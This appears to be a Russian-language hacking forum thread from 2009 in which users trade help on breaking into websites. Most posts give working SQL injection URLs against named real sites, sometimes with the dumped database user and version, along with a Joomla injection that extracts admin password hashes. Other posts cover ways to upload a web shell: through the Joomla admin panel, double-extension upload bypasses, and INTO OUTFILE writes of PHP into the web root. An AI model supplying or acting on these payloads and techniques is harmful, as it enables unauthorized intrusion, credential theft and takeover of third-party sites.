Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null--

    http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,TABLENAME,null,null,null,null,null,null,null,null,null,null,null,null+from+PG_TABLES--

    всё как обычно, в чём трудности?
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Блин, о минусе забыл... В статье его не было - думал нельзя так
     
  3. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Вопросик, вот пример

    http : // infovisa . ru /index.php?id=44'

    реально посмотреть в запрос можно что угодно вроде как вставить, но ниче не получается.
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://infovisa.ru/index.php?id=44'+order+by+7+--+
    7 полей..

    Code:
    http://infovisa.ru/index.php?id=-44'+union+sElect+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version())+--+
    infovisa_site@localhost:infovisa_site:5.0.67-community
     
    #6984 mailbrush, 9 May 2009
    Last edited: 9 May 2009
  5. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    сенкс
     
  6. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Подскажите, если присутствует такая sql-inj:
    Code:
    index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,usertype,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
    С помощью нее можно залить шелл? если да, то как?
     
  7. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    это джумла(joomla)
    после того как сбрутишь пасс админа логинишься в админку
    адмника тут - site.com/administrator/
    а дальше через установку модулей и компонентов, или через языки.
    также если установлен компонент joomla_extplorer, можно и через него.
     
    1 person likes this.
  8. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Как можно обойти фильтрацию скобок при sql-inj?
     
    #6988 InFlame, 9 May 2009
    Last edited: 9 May 2009
  9. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    подскажите
    может кто-то сталкивался с хостингом mirohost
    как мне пробраться к авторизации в phpmyadmin
     
  10. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    только не тестовому
     
  11. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    помогите разобраться, что делаю не так, почему не выводятся значения?
    версия 5
    таблица и колонки существуют

    HTML:
    ht*p://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,users_login,users_pas),4,5+from+sip_zoorinok.USERS+limit+1,1/*
     
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,cast(users_login+as+binary),cast(users_pas+as+binary)),4,5+from+sip_zoorinok.USERS+limit+1,1/*
     
    1 person likes this.
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Всех с 9 Мая

    Tакой вопрос , мознали как то на сайт закинут shell ( есть админка ) , тока вот format php нельзя .Можно Ли это как то обойти ?
     
  14. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Попробуй двойное расширение типа shell.gif.php
    Не опытные программисты часто допускуют такую ошибку, так как проверяют расширение идущее после первой точки.
     
  15. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Вот что у меня получилось выудить у службы поддержки:


    То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно...

    Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга:

    Code:
    http://mirror.mirohost.net/

    Что я там обнаружил, от туда можно скачать phpmyadmin oO

    Code:
    http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/
    А также различные конфиги похопе, но это если интересует...
     
  16. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    В зависимости от конкретной ситуации и конкретного примера...
     
  17. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    С праздником!

    Такой вопрос:
    есть phpmyadmin от юзера root@localhost со всеми привелегиями...при запросе типа
    select '<? phpinfo(); ?>' into outfile '/patch_to_public_html/shell.php'
    выдает "#1 - Can't create/write to file '.../shell.php' (Errcode: 13)"
    В корень, в папки usr,var - та же ошибка... почему это у рута не хватает прав на создание файла Оо ?
     
  18. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    так root то mysql ный а не системный!
     
  19. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.

    DeepXhadow, root в mysql не является рутом в системе. У тебя права скорее всего просто mysql. Ищи на сайте диры с правами на запись для всех.
     
  20. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Уязвимосто-не уязвимость а некоторые свединия о системе выдаёт...
     
Thread Status:
Not open for further replies.